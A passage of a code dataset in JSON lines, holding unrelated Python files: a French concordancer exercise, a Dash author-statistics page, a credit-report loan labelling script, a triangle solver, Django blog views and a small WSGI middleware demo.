d={}\n liste_fichier=os.listdir('fr/appr')\n for fichier in liste_fichier:\n liste_mot=separation(fichier)\n f=open(\"fr/appr/\"+fichier,\"r\",encoding=\"utf8\")\n texte_fichier=f.read()\n f.close()\n for mot in liste_mot:\n liste_index_mot=indexation(mot,fichier)\n\n for index in liste_index_mot:\n d[mot]={fichier:[texte_fichier[index[0]-nombre:index[0]],texte_fichier[index[1]:index[1]+nombre]] }\n return d \n \n \n \ndef indexation(mot,fichier):\n liste_index=[]\n f=open(\"fr/appr/\"+fichier,\"r\",encoding=\"utf8\")\n texte=f.read()\n for a in re.finditer(mot,texte):\n liste_index.append((a.start(),a.end(),mot))\n f.close()\n return liste_index\n \n#EXERCICE 2\n \n \ndef affichage(dico):\n for mot in dico:\n for fichier in dico[mot]:\n print(dico[mot][fichier][0]+'\\t'+mot+'\\t'+dico[mot][fichier][1])\n \n\n\n\nif __name__==\"__main__\":\n f=open(\"dico\",\"r\",encoding=\"utf8\")\n dicojson=json.load(f)\n affichage(dicojson)\n f.close()\n \n \n\n\n\n###EXEMPLE D'AIDE\n##\n##f = open(\"fr/appr/2009-01-14_celex_IP-09-48.fr.html\",'r')\n###for a in re.finditer(\"premier\",f.read()):\n### print (a.start(),a.end())\n##\n##print(f.read()[20:38])\n##f.close()\n","sub_path":"L2/Semestre 3/Traitement automatique des langues/TP6 concordancier/tp6_mekhelef_bensitel.py","file_name":"tp6_mekhelef_bensitel.py","file_ext":"py","file_size_in_byte":2573,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"77"} +{"seq_id":"329563527","text":"# Python Standard Libraries\n#\n# External Libraries\nimport dash_table\nimport dash_bootstrap_components as dbc\nimport dash_core_components as dcc\nimport dash_html_components as html\nimport plotly.graph_objects as go\nimport pandas as pd\n# Components\n# Model\nfrom system.components.model.author import get_author_data_db, get_papers_by_author_db\n# Controller \nfrom system.components.controller.nlp_tools import topic_modelling, common_words, common_bigrams, common_speech_tagging\n# Get plot author\ndef get_plot_author(name):\n author = get_author_data_db(name)\n idx = 
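[Editor's note] In ms.py, dico is keyed by document index while l[i] is a cluster id, so print(l[i], dico[l[i]]) pairs each label with the words of an unrelated document. The presumable intent, as a sketch:

# Pair each document's own feature words with the cluster it was assigned to.
for i in range(len(l)):
    print(l[i], dico.get(i, ""))   # .get covers documents with no matched features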
author[0]\n name = author[1]\n affiliation = author[2]\n citedby = author[3]\n cites_by_year = eval(author[4])\n email = author[5]\n url_picture = author[6]\n if url_picture == \"URL picture not available\":\n url_picture = \"./assets/user-empty.png\"\n interests = author[7] \n # Figure cites by year\n x = list(cites_by_year.keys())\n y = list(cites_by_year.values())\n fig_cites_year = go.Figure(go.Bar(x=x, y=y))\n fig_cites_year.update_layout(margin=dict(l=0, r=0, t=5, b=0), xaxis_title=\"Year\", yaxis_title=\"Cites\")\n # Get papers by author\n papers = get_papers_by_author_db(idx)\n # Papers datatable\n df_papers = pd.DataFrame(papers)\n df_papers.columns = [\"ID\", \"Title\", \"Abstract\", \"Authors\", \"Year\", \"Cites\", \"Journal\", \"Publisher\", \"j\", \"z\"]\n df_papers = df_papers.drop([\"j\", \"z\"], axis=1)\n table = dash_table.DataTable(\n id=\"table\",\n style_table={\n 'overflowY': 'auto',\n 'overflowX': 'auto',\n 'height': \"75vh\"\n },\n tooltip_data=[\n {\n column: {'value': str(value)}\n for column, value in row.items()\n } for row in df_papers.to_dict('rows')\n ],\n tooltip_duration=None,\n style_cell={\n 'whiteSpace': 'normal',\n \"word-break\": \"break-word\",\n 'height': 'auto',\n 'minWidth': '10px', 'width': '90px', 'maxWidth': '200px',\n },\n data=df_papers.to_dict(\"rows\"),\n columns=[{\"name\": i, \"id\": i} for i in df_papers.columns],\n \n style_data_conditional=[ \n {\n 'if': {'row_index': 'odd'},\n 'backgroundColor': 'rgb(248, 248, 248)'\n }\n ],\n \n style_cell_conditional=[\n {\n 'if': {'column_id': 'Abstract'},\n 'width': '30%'\n },\n {\n 'if': {'column_id': 'ID'},\n 'width': '5%'\n },\n {\n 'if': {'column_id': 'Title'},\n 'width': '10%'\n },\n {\n 'if': {'column_id': 'Year'},\n 'width': '5%'\n },\n {\n 'if': {'column_id': 'Cites'},\n 'width': '5%'\n }\n ],\n \n style_header={\n 'backgroundColor': 'rgb(230, 230, 230)',\n 'fontWeight': 'bold'\n },\n # To edit elements\n #columns=[{\"name\": i, \"id\": i, \"editable\": False if i == \"id\" else True} for i in df.columns],\n editable=False,\n row_deletable=False,\n page_size= 10,\n )\n # N papers\n n_papers = len(papers)\n # Get years\n years = []\n for paper in papers:\n years.append(paper[4])\n fig_papers_year = go.Figure(go.Histogram(x=years, xbins=dict(start=1950, end=2021, size=1)))\n fig_papers_year.update_layout(margin=dict(l=0, r=0, t=5, b=0), xaxis_title=\"Year published\", yaxis_title=\"Papers\")\n # Get abstracts\n abstracts = []\n for paper in papers:\n abstracts.append(paper[2])\n # Topic modelling\n topics = topic_modelling(abstracts)\n # Common words\n words, count_words = common_words(abstracts)\n fig_common_words = go.Figure(go.Bar(x=count_words, y=words, orientation=\"h\"))\n fig_common_words.update_layout(margin=dict(l=0, r=0, t=5, b=0), xaxis_title=\"Count\", yaxis_title=\"Word\")\n # Common bigrams\n bigrams, count_bigrams = common_bigrams(abstracts)\n fig_common_bigrams = go.Figure(go.Bar(x=count_bigrams, y=bigrams, orientation=\"h\"))\n fig_common_bigrams.update_layout(margin=dict(l=0, r=0, t=5, b=0), xaxis_title=\"Count\", yaxis_title=\"Bigram\")\n # Common speech tagging\n tags, count_tags = common_speech_tagging(abstracts)\n fig_common_tags = go.Figure(go.Bar(x=count_tags, y=tags, orientation=\"h\"))\n fig_common_tags.update_layout(margin=dict(l=0, r=0, t=5, b=0), xaxis_title=\"Count\", yaxis_title=\"Tag\")\n\n # Plot layout\n if author != []:\n plot = html.Div([\n dcc.Tabs([\n dcc.Tab(\n html.Div([\n html.Br(),\n html.Div([\n html.Div([\n html.Img(src=url_picture),\n 
],id=\"author-picture\"),\n html.Div([\n html.H4(name),\n html.H5(affiliation),\n html.P(email),\n html.P(f\"Cites: {citedby}\"),\n html.P(f\"Papers published: {n_papers}\"),\n html.P(f\"Cites/Papers: {citedby/n_papers:.3f}\"),\n html.P(f\"Interests: {interests}\")\n ], id=\"author-data\")\n ], className=\"row\")\n ]), label=\"Description\"\n ),\n dcc.Tab(\n html.Div(table),label=\"Papers\"\n ),\n dcc.Tab(\n dcc.Tabs([\n dcc.Tab(\n html.Div([\n dcc.Graph(figure=fig_cites_year, config={ 'displayModeBar': False}, responsive=True)\n ]), label=\"Cited by year\"\n ),\n dcc.Tab(\n html.Div([\n dcc.Graph(figure=fig_papers_year, config={ 'displayModeBar': False}, responsive=True)\n ]), label=\"Papers by year\"\n ),\n ]), label = \"Year\"\n ),\n dcc.Tab(\n html.Div([\n html.Iframe(srcDoc=str(topics), id=\"iframe-topic\")\n ], id=\"topic-div\"), label=\"Topic\"\n ),\n dcc.Tab(\n dcc.Tabs([\n dcc.Tab(\n html.Div([\n dcc.Graph(figure=fig_common_words, config={ 'displayModeBar': False}, responsive=True)\n ], id=\"common-words-div\"), label=\"Words\"\n ),\n dcc.Tab(\n html.Div([\n dcc.Graph(figure=fig_common_bigrams, config={ 'displayModeBar': False}, responsive=True)\n ], id=\"common-bigrams-div\"), label=\"Bigrams\"\n ),\n dcc.Tab(\n html.Div([\n dcc.Graph(figure=fig_common_tags, config={ 'displayModeBar': False}, responsive=True)\n ], id=\"common-tags-div\"), label=\"Speech Tagging\"\n )\n ]), label=\"Frequency\"\n )\n ])\n ])\n return plot\n else:\n return None\n ","sub_path":"system/components/controller/author.py","file_name":"author.py","file_ext":"py","file_size_in_byte":8310,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"77"} +{"seq_id":"102182101","text":"import datetime as dt\nimport json\nimport logging\nimport re\n\nimport numpy as np\nimport pandas as pd\nfrom dateutil.relativedelta import relativedelta\n\nfrom clean_data import CleanOverdue, CleanLoan\n\n\nclass Reference(object):\n maxcap_date = dt.datetime(year=2019, month=1, day=1)\n\n def __init__(self, report_no, overdue_df, loan_df):\n self.report_no = report_no\n self.overdue_df = overdue_df\n self.loan_df = loan_df\n\n self.loan = None\n self.overdue = None\n self.loan_overdue = None\n\n self.reference_account = None\n self.reference_date = None\n\n self.label_loan = None\n\n self.logger = logging.getLogger('master.reference')\n\n def clean_overdue(self):\n result_overdue = self.overdue_df[[\n 'OverdueDetailAccount', 'OverdueDetailMon',\n 'OverdueDetailLatestMons', 'OverdueDetailAmt'\n ]]\n\n result_overdue = result_overdue.astype(\n dtype={\n 'OverdueDetailAccount': object,\n 'OverdueDetailMon': dt.datetime,\n 'OverdueDetailLatestMons': float,\n 'OverdueDetailAmt': float\n })\n return result_overdue\n\n def clean_loan(self, loan):\n if len(loan) == 0:\n result_loan = pd.DataFrame(columns=[\n 'LoanAccount', 'LoanCue', 'LoanFinanceType', 'LoanFinanceOrg',\n 'LoanType', 'LoanCurrency', 'LoanOpenDate', 'LoanEndDate',\n 'LoanLimitAmt', 'LoanGuaranType', 'LoanPayRating',\n 'LoanPayCyc', 'LoanBadBalance', 'LoanStateEndDate',\n 'LoanStateEndMon', 'LoanBeginMon', 'LoanEndMon',\n 'LoanLatest24State', 'LoanBalance', 'LoanRemainPayCyc',\n 'LoanScheduledPayAmt', 'LoanNewEndDate'\n ])\n\n else:\n result_loan = loan[[\n 'LoanAccount', 'LoanCue', 'LoanFinanceType', 'LoanFinanceOrg',\n 'LoanType', 'LoanCurrency', 'LoanOpenDate', 'LoanEndDate',\n 'LoanLimitAmt', 'LoanGuaranType', 'LoanPayRating',\n 'LoanPayCyc', 'LoanBadBalance', 'LoanStateEndDate',\n 'LoanStateEndMon', 'LoanBeginMon', 'LoanEndMon',\n 
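[Editor's note] author.py builds the tooltip rows with df_papers.to_dict('rows'); 'rows' only matches 'records' through pandas' old abbreviated-orient handling, which newer releases deprecate and then reject, so the documented spelling is safer. The same construction with 'records':

tooltips = [
    {column: {'value': str(value)} for column, value in row.items()}
    for row in df_papers.to_dict('records')
]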
'LoanLatest24State', 'LoanBalance', 'LoanRemainPayCyc',\n 'LoanScheduledPayAmt'\n ]]\n\n new_loan_end_date_list = []\n for loan_account in list(loan['LoanAccount']):\n loan_sub = loan[loan['LoanAccount'] == loan_account]\n loan_latest_24_state = loan_sub['LoanLatest24State'].iloc[0]\n loan_end_date = loan_sub['LoanEndDate'].iloc[0]\n loan_state_end_date = loan_sub['LoanStateEndDate'].iloc[0]\n\n if loan_latest_24_state == '':\n loan_new_end_date = loan_state_end_date\n elif loan_end_date > loan_state_end_date:\n loan_new_end_date = loan_end_date\n else:\n loan_new_end_date = self.maxcap_date\n new_loan_end_date_list.append(loan_new_end_date)\n tmp_df = pd.DataFrame({\n 'LoanAccount': list(loan['LoanAccount']),\n 'LoanNewEndDate': new_loan_end_date_list\n })\n result_loan = pd.merge(result_loan, tmp_df, on='LoanAccount')\n\n result_loan = result_loan.astype(\n dtype={\n 'LoanAccount': object,\n 'LoanCue': object,\n 'LoanFinanceType': object,\n 'LoanFinanceOrg': object,\n 'LoanType': object,\n 'LoanCurrency': object,\n 'LoanOpenDate': dt.datetime,\n 'LoanEndDate': dt.datetime,\n 'LoanLimitAmt': float,\n 'LoanGuaranType': object,\n 'LoanPayRating': object,\n 'LoanPayCyc': float,\n 'LoanBadBalance': float,\n 'LoanStateEndDate': dt.datetime,\n 'LoanStateEndMon': dt.datetime,\n 'LoanBeginMon': dt.datetime,\n 'LoanEndMon': dt.datetime,\n 'LoanLatest24State': object,\n 'LoanBalance': float,\n 'LoanRemainPayCyc': float,\n 'LoanScheduledPayAmt': float,\n 'LoanNewEndDate': dt.datetime\n })\n\n return result_loan\n\n def updated_overdue(self):\n # generate current overdue info using latest24 state\n current_loan_accounts = list(self.loan[\n ~self.loan['LoanLatest24State'].isnull()]['LoanAccount'].unique())\n\n overdue_latest24_loan = pd.DataFrame()\n if len(current_loan_accounts) > 0:\n for account in current_loan_accounts:\n pattern = re.compile('[1-7]')\n latest24 = str(self.loan[self.loan['LoanAccount'] == account][\n 'LoanLatest24State'].iloc[0])\n overdue_detail_month_list = []\n overdue_detail_last_months_list = []\n for m in pattern.finditer(latest24):\n overdue_detail_last_months_list.append(m.group())\n overdue_detail_month_list.append(\n self.loan[self.loan['LoanAccount'] ==\n account]['LoanBeginMon'].iloc[0] +\n relativedelta(months=m.start()))\n overdue_latest24_loan_sub = pd.DataFrame({\n 'OverdueDetailAccount':\n account,\n 'OverdueDetailMon':\n overdue_detail_month_list,\n 'OverdueDetailLatestMons':\n overdue_detail_last_months_list,\n 'OverdueDetailAmt':\n np.nan\n })\n overdue_latest24_loan = overdue_latest24_loan.append(\n overdue_latest24_loan_sub)\n\n overdue_latest24 = pd.concat([overdue_latest24_loan])\n\n # merge current (latest24) overdue info with historical (5 years) overdue info\n updated_overdue = self.clean_overdue().append(overdue_latest24)\n updated_overdue.dropna(\n subset=[\n 'OverdueDetailAccount', 'OverdueDetailMon',\n 'OverdueDetailLatestMons'\n ],\n how='all',\n inplace=True)\n updated_overdue['OverdueDetailLatestMons'] = updated_overdue[\n 'OverdueDetailLatestMons'].astype(float)\n updated_overdue.sort_values(\n by=['OverdueDetailAccount', 'OverdueDetailMon'], inplace=True)\n updated_overdue.reset_index(drop=True, inplace=True)\n return updated_overdue\n\n def clean_loan_overdue(self):\n result_loan_overdue = pd.merge(\n self.loan,\n self.overdue,\n left_on='LoanAccount',\n right_on='OverdueDetailAccount',\n how='left')\n del result_loan_overdue['OverdueDetailAccount']\n result_loan_overdue = result_loan_overdue.astype(\n dtype={\n 'OverdueDetailMon': 
dt.datetime,\n 'OverdueDetailLatestMons': float,\n 'OverdueDetailAmt': float\n })\n result_loan_overdue.dropna(how='all', inplace=True)\n result_loan_overdue.sort_values(\n by=[\n 'LoanOpenDate', 'LoanAccount', 'OverdueDetailMon',\n 'OverdueDetailAmt'\n ],\n ascending=[True, True, True, False],\n inplace=True)\n result_loan_overdue.reset_index(drop=True, inplace=True)\n return result_loan_overdue\n\n def reference(self, overdue_sub):\n if len(overdue_sub) > 0:\n reference_account_list = []\n reference_date_list = []\n for account in overdue_sub['LoanAccount'].unique():\n reference_account_list.append(account)\n reference_date_list.append(\n self.loan_overdue.loc[self.loan_overdue['LoanAccount'] ==\n account, 'LoanOpenDate'].iloc[0])\n\n reference_df = pd.DataFrame(\n {\n 'ReferenceAccount': reference_account_list,\n 'ReferenceDate': reference_date_list,\n },\n columns=['ReferenceAccount', 'ReferenceDate'])\n\n elif len(self.loan[~self.loan['LoanLatest24State'].isnull()]) != 0:\n reference_account_list = []\n reference_date_list = []\n for account in self.loan['LoanAccount'].unique():\n if self.loan.loc[self.loan['LoanAccount'] == account,\n 'LoanLatest24State'].isnull().iloc[0] == 0:\n reference_account_list.append(account)\n reference_date_list.append(self.loan.loc[self.loan[\n 'LoanAccount'] == account, 'LoanOpenDate'].iloc[0])\n\n reference_df = pd.DataFrame(\n {\n 'ReferenceAccount': reference_account_list,\n 'ReferenceDate': reference_date_list,\n },\n columns=['ReferenceAccount', 'ReferenceDate'])\n else:\n reference_account_list = []\n reference_date_list = []\n for account in self.loan['LoanAccount'].unique():\n reference_account_list.append(account)\n reference_date_list.append(self.loan.loc[self.loan[\n 'LoanAccount'] == account, 'LoanOpenDate'].iloc[0])\n\n reference_df = pd.DataFrame(\n {\n 'ReferenceAccount': reference_account_list,\n 'ReferenceDate': reference_date_list,\n },\n columns=['ReferenceAccount', 'ReferenceDate'])\n\n reference_df.sort_values(\n by=['ReferenceDate', 'ReferenceAccount'],\n ascending=[False, False],\n inplace=True)\n reference = reference_df.iloc[0]\n return reference\n\n def sample_selection(self, loan_state, loan_class5_state, loan_type,\n loan_guaran_type, loan_limit_amt):\n loan0 = self.loan_df\n\n if loan_state == 'all':\n loan1 = loan0\n else:\n try:\n loan1 = loan0[loan0['LoanState'].isin(loan_state)]\n except Exception:\n return 'please input correct loan_state'\n\n if loan_class5_state == 'all':\n loan2 = loan1\n else:\n try:\n loan2 = loan1[loan1['LoanClass5State'].isin(loan_class5_state)]\n except Exception:\n return 'please input correct loan_class5_state'\n\n if loan_type == 'all':\n loan3 = loan2\n else:\n try:\n loan3 = loan2[loan2['LoanType'].isin(loan_type)]\n except Exception:\n return 'please input correct loan_type'\n\n if loan_guaran_type == 'all':\n loan4 = loan3\n else:\n try:\n loan4 = loan3[loan3['LoanGuaranType'].isin(loan_guaran_type)]\n except Exception:\n return 'please input correct LoanGuaranType'\n\n if loan_limit_amt == 'all':\n loan5 = loan4\n else:\n try:\n loan5 = loan4[(loan4['LoanLimitAmt'] >= loan_limit_amt[0])\n & (loan4['LoanLimitAmt'] <= loan_limit_amt[-1])]\n except Exception:\n return 'please input correct LoanLimitAmt'\n\n self.loan = self.clean_loan(loan5)\n self.overdue = self.updated_overdue()\n self.loan_overdue = self.clean_loan_overdue()\n\n def blacklist_selection(self, overdue_last_months, overdue_amount):\n overdue_sub0 = self.loan_overdue\n\n if overdue_last_months == 'all':\n overdue_sub1 = 
overdue_sub0\n else:\n try:\n overdue_sub1 = overdue_sub0[\n (overdue_sub0['OverdueDetailLatestMons'] >=\n overdue_last_months[0])\n & (overdue_sub0['OverdueDetailLatestMons'] <=\n overdue_last_months[-1])]\n except Exception:\n return 'please input correct overdue_last_months'\n\n if overdue_amount == 'all':\n overdue_sub2 = overdue_sub1\n else:\n try:\n overdue_sub2 = overdue_sub1[\n (overdue_sub1['OverdueDetailAmt'] >= overdue_amount[0])\n & (overdue_sub1['OverdueDetailAmt'] <= overdue_amount[-1])]\n except Exception:\n return 'please input correct overdue_amount'\n self.reference_account, self.reference_date = self.reference(\n overdue_sub2)\n if len(overdue_sub2) > 0:\n self.label_loan = 1\n else:\n self.label_loan = 0\n\n def update_loan_overdue(self):\n data = self.loan_overdue[\n self.loan_overdue['LoanOpenDate'] <= self.reference_date]\n data1 = data[~data['OverdueDetailMon'].isnull()]\n data2 = data[data['OverdueDetailMon'].isnull()]\n result = pd.DataFrame()\n result = result.append(data2)\n for loan_accounts in data1['LoanAccount'].unique():\n data_sub = data1[data1['LoanAccount'] == loan_accounts]\n if min(data_sub['OverdueDetailMon']) > self.reference_date:\n data_sub['OverdueDetailAmt'] = np.nan\n data_sub['OverdueDetailLatestMons'] = np.nan\n data_sub['OverdueDetailMon'] = np.datetime64('nat')\n result = result.append(data_sub.iloc[0])\n else:\n result = result.append(data_sub[\n data_sub['OverdueDetailMon'] <= self.reference_date])\n\n result = result[result['LoanAccount'] != self.reference_account]\n result.sort_values(\n by=[\n 'LoanOpenDate', 'LoanAccount', 'OverdueDetailMon',\n 'OverdueDetailAmt'\n ],\n ascending=[True, True, True, False],\n inplace=True)\n result.reset_index(drop=True, inplace=True)\n return result\n\n\nif __name__ == '__main__':\n\n logger = logging.getLogger('master')\n logger.setLevel(logging.INFO)\n\n handler = logging.FileHandler('data/reference_20180314.log', mode='w')\n handler.setLevel(logging.INFO)\n formatter = logging.Formatter(\n '%(asctime)s - %(name)s - %(levelname)s - %(message)s')\n handler.setFormatter(formatter)\n logger.addHandler(handler)\n\n logger.warning('####program start####')\n\n result_all = pd.DataFrame()\n with open('data/sample_data_20180307_v0.1.json', 'rb') as f:\n for n, i in enumerate(f):\n if n % 100 == 0:\n print(n)\n data = json.loads(i)\n loan_df = pd.DataFrame(\n data['ICRLoanInfo'],\n columns=[\n 'LoanAccount', 'LoanActualPayAmt', 'LoanBadBalance',\n 'LoanBalance', 'LoanBeginMon', 'LoanClass5State',\n 'LoanCue', 'LoanCurrOverdueAmt', 'LoanCurrOverdueCyc',\n 'LoanCurrency', 'LoanEndDate', 'LoanEndMon',\n 'LoanFinanceOrg', 'LoanFinanceType', 'LoanGuaranType',\n 'LoanID', 'LoanLatest24State', 'LoanLimitAmt',\n 'LoanOpenDate', 'LoanPayCyc', 'LoanPayRating',\n 'LoanRecentPayDate', 'LoanRemainPayCyc',\n 'LoanScheduledPayAmt', 'LoanScheduledPayDate', 'LoanState',\n 'LoanStateEndDate', 'LoanStateEndMon', 'LoanType',\n 'LoanbizType', 'Overdue31To60Amt', 'Overdue61To90Amt',\n 'Overdue91To180Amt', 'OverdueOver180Amt'\n ])\n overdue_df = pd.DataFrame(\n data['ICRLatest5YearOverdueDetail'],\n columns=[\n 'OverdueDetailAccount', 'OverdueDetailAmt',\n 'OverdueDetailID', 'OverdueDetailLatestMons',\n 'OverdueDetailMon'\n ])\n report_no = data['ICRHeader'][0]['ReportNo']\n logger.info('{}_{}'.format(n, report_no))\n\n loan_df_1 = CleanLoan(loan_df).clean_columns()\n overdue_df_1 = CleanOverdue(overdue_df).clean_columns()\n\n reference = Reference(report_no, overdue_df_1, loan_df_1)\n reference.sample_selection(\n 
loan_state='all',\n loan_class5_state='all',\n loan_type='all',\n loan_guaran_type='all',\n loan_limit_amt='all')\n reference.blacklist_selection(\n overdue_last_months='all', overdue_amount='all')\n\n result = reference.update_loan_overdue()\n result['ReportNo'] = report_no\n result['ReferenceAccount'] = reference.reference_account\n result['ReferenceDate'] = reference.reference_date\n result['LabelLoan'] = reference.label_loan\n\n result_all = result_all.append(result)\n # break\n\n # result_all.replace(np.nan, 0, inplace=True)\n result_all.reset_index(drop=True, inplace=True)\n\n result_all.to_csv(\n 'data/reference_loan_account_info_20180314.csv',\n index=False,\n encoding='utf8')\n\n logger.warning('####program end####')\n\n handlers = logger.handlers[:]\n for handler in handlers:\n handler.close()\n logger.removeHandler(handler)\n","sub_path":"reference_loan_tianfu.py","file_name":"reference_loan_tianfu.py","file_ext":"py","file_size_in_byte":17435,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"77"} +{"seq_id":"194492163","text":"'''Functions for seeing what to calculate and calling the appropriate functions to\r\ncalculate angles and side lengths\r\nIMPORTANT: Angles must be given in radians and angles are returned in radians\r\n'''\r\n\r\nimport sine, cosine\r\n\r\n\r\n# Sees what to solve and solves the angles/sides using sine\r\ndef solve_sine(a=0, b=0, c=0, A=0, B=0, C=0):\r\n if a != 0 and A != 0:\r\n other_angle = A\r\n other_side = a\r\n elif b != 0 and B != 0:\r\n other_angle = B\r\n other_side = b\r\n elif c != 0 and C != 0:\r\n other_angle = C\r\n other_side = c\r\n else:\r\n raise Exception('other_side and other_angle could not be assigned. Not enough angles and sides.')\r\n\r\n if a != 0 and A == 0:\r\n return a, b, c, sine.solve_angle(a, other_angle, other_side), B, C\r\n elif b != 0 and B == 0:\r\n return a, b, c, A, sine.solve_angle(b, other_angle, other_side), C\r\n elif c != 0 and C == 0:\r\n return a, b, c, A, B, sine.solve_angle(c, other_angle, other_side)\r\n\r\n elif a == 0 and A != 0:\r\n return sine.solve_side(A, other_angle, other_side), b, c, A, B, C\r\n elif b == 0 and B != 0:\r\n return a, sine.solve_side(B, other_angle, other_side), c, A, B, C\r\n elif c == 0 and C != 0:\r\n return a, b, sine.solve_side(C, other_angle, other_side), A, B, C\r\n\r\n return a, b, c, A, B, C\r\n\r\n\r\n# Sees what to solve and solves the angles/sides using cosine\r\ndef solve_cosine(a=0, b=0, c=0, A=0, B=0, C=0):\r\n if a == 0 and A != 0 and b != 0 and c != 0:\r\n return cosine.solve_opposite(b, c, A), b, c, A, B, C\r\n elif b == 0 and B != 0 and a != 0 and c != 0:\r\n return a, cosine.solve_opposite(a, c, B), c, A, B, C\r\n elif c == 0 and C != 0 and a != 0 and b != 0:\r\n return a, b, cosine.solve_opposite(a, b, C), A, B, C\r\n\r\n elif A == 0 and a != 0 and b != 0 and c != 0:\r\n return a, b, c, cosine.solve_angle(b, c, a), B, C\r\n elif B == 0 and a != 0 and b != 0 and c != 0:\r\n return a, b, c, A, cosine.solve_angle(a, c, b), C\r\n elif C == 0 and a != 0 and b != 0 and c != 0:\r\n return a, b, c, A, B, cosine.solve_angle(a, b, c)\r\n\r\n return a, b, c, A, B, C\r\n\r\n","sub_path":"TriSolver/solve.py","file_name":"solve.py","file_ext":"py","file_size_in_byte":2166,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"77"} +{"seq_id":"31083086","text":"from django.contrib.auth import login\nfrom django.contrib.auth.mixins import LoginRequiredMixin\nfrom datetime import datetime\n\nfrom 
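[Editor's note] Each call to solve_cosine/solve_sine in solve.py fills in at most one unknown (the first branch that matches), so completing a triangle means calling repeatedly. A hypothetical round trip on a 3-4-5 right triangle, assuming the cosine helpers behave as their names suggest:

import math

a, b, c, A, B, C = solve_cosine(a=3, b=4, c=5)      # solves A
a, b, c, A, B, C = solve_cosine(a, b, c, A, B, C)   # solves B
a, b, c, A, B, C = solve_cosine(a, b, c, A, B, C)   # solves C (pi/2 here)
assert abs(A + B + C - math.pi) < 1e-9              # angles sum to pi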
django.core.paginator import Paginator\nfrom django.http import Http404\nfrom django.shortcuts import redirect, render\nfrom django.views import View\nfrom django.views.generic import DetailView\n\nfrom blogs.forms import SignUpForm, PostForm, BlogForm\n\nfrom blogs.models import Post, Category, Blog\n\n\ndef home(request):\n now = datetime.now()\n all_post = Post.objects.filter(publish_date__lte=now).order_by(\"-publish_date\")\n context = {'posts': all_post}\n return render(request, \"home.html\", context)\n\n\ndef user_posts_list(request, nombre_usuario):\n now = datetime.now()\n # Categorias para el filtro\n categories = Category.objects.all().order_by(\"name\")\n posts_list = Post.objects.filter(user__username=nombre_usuario, publish_date__lte=now).order_by(\"-publish_date\")\n # Información para la cabecera del blog\n try:\n blog_info = Blog.objects.get(user__username=nombre_usuario)\n except:\n return render(request, \"404.html\")\n paginator = Paginator(posts_list, 5)\n page = request.GET.get('page')\n posts = paginator.get_page(page)\n context = {'posts': posts, 'blog': blog_info, 'categories': categories, 'owner': nombre_usuario}\n return render(request, \"my_blog.html\", context)\n\n\ndef blogs_list(request):\n all_blogs = Blog.objects.filter().order_by(\"blog_name\")\n return render(request, \"blogs_list.html\", {\"blogs\": all_blogs})\n\n\ndef search_categories(request):\n now = datetime.now()\n # Categorias para el filtro\n categories = Category.objects.all().order_by(\"name\")\n username = request.GET.get('owner')\n idcat = request.POST.get('categoria')\n if idcat == '0':\n posts_list = Post.objects.filter(user__username=username, publish_date__lte=now).order_by(\"-publish_date\")\n else:\n posts_list = Post.objects.filter(categories__in=[idcat], user__username=username,\n publish_date__lte=now).order_by(\"-publish_date\")\n paginator = Paginator(posts_list, 5)\n page = request.GET.get('page')\n posts = paginator.get_page(page)\n context = {'posts': posts, 'owner': username, 'categories': categories}\n return render(request, \"my_blog.html\", context)\n\n\nclass SignUpView(View):\n\n def get(self, request):\n formUser = SignUpForm()\n formBlog = BlogForm()\n return render(request, \"signup.html\", {\"formUser\": formUser, \"formBlog\": formBlog})\n\n def post(self, request):\n user_form = SignUpForm(request.POST)\n blog_form = BlogForm(request.POST)\n if user_form.is_valid() and blog_form.is_valid():\n # User save from form\n user = user_form.save()\n user.blog.blog_name = blog_form.instance.blog_name\n user.blog.blog_description = blog_form.instance.blog_description\n user.save()\n # User autenctication\n login(request, user)\n return redirect(\"home_page\")\n return render(request, \"signup.html\", {\"formUser\": user_form, \"formBlog\": blog_form})\n\n\nclass CreatePostView(LoginRequiredMixin, View):\n\n login_url = \"/login\"\n\n def get(self, request):\n form = PostForm()\n return render(request, \"create_post_form.html\", {\"form\": form})\n\n def post(self, request):\n post = Post()\n post.user = request.user #select user autenticated\n form = PostForm(request.POST, request.FILES, instance=post)\n if form.is_valid():\n form.save()\n return redirect(\"home_page\")\n return render(request, \"create_post_form.html\", {\"form\": form})\n\n\nclass PostDetailView(DetailView):\n\n model = Post\n template_name = 'post_detail.html'\n\n def get_queryset(self):\n query = super(PostDetailView, self).get_queryset()\n now = datetime.now()\n return 
query.filter(publish_date__lte=now)\n\n def get(self, request, *args, **kwargs):\n try:\n self.object = self.get_object()\n except Http404:\n # redirect here\n return render(request,\"404.html\")\n context = self.get_context_data(object=self.object)\n return self.render_to_response(context)","sub_path":"src/blogs/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":4255,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"77"} +{"seq_id":"204451517","text":"import os\nfrom jinja2 import Template, Environment, FileSystemLoader\n\ntopDiv = \"
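[Editor's note] The bare except around Blog.objects.get in user_posts_list swallows every error, including real bugs; catching the model's DoesNotExist is the narrower pattern and keeps the existing 404.html rendering. A sketch:

try:
    blog_info = Blog.objects.get(user__username=nombre_usuario)
except Blog.DoesNotExist:
    return render(request, "404.html")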
<div>Middleware TOP</div>\"\nbottomDiv = \"<div>Middleware BOTTOM</div>
\"\nopenTag = \"\"\ncloseTag = \"\"\nenv = Environment(loader=FileSystemLoader(['./', './about']))\n\ndef App(environ, start_response):\n filepath = '.' + environ['PATH_INFO']\n print(filepath)\n if (filepath == './' or filepath == './index.html' or filepath == './about/about.html'):\n template = env.get_template(filepath)\n start_response('200 OK', [('Content-type', 'text/HTML')])\n return [template.render(name=filepath.split('/')[1]).encode('utf-8')]\n else:\n start_response('404 Not Found', [(\"Content-Type\", \"text/html\")])\n return ['File not found!'.encode()]\n \nclass Middleware(object):\n def __init__(self, app):\n self.app = app\n \n def __call__(self, environ, start_response):\n text = self.app(environ, start_response)[0].decode('utf-8')\n if text.find(openTag) != -1:\n text = text[:(text.find(openTag)+len(openTag))] + topDiv + text[(text.find(openTag)+len(openTag)):]\n print(text)\n if text.find(closeTag) != -1:\n text = text[:text.find(closeTag)] + bottomDiv + text[text.find(closeTag):]\n return [text.encode()]\n\nif __name__ == '__main__':\n from wsgiref.simple_server import make_server\n app = Middleware(App)\n _server = make_server('localhost', 8000, app)\n print (\"Serving localhost on port 8000...\")\n 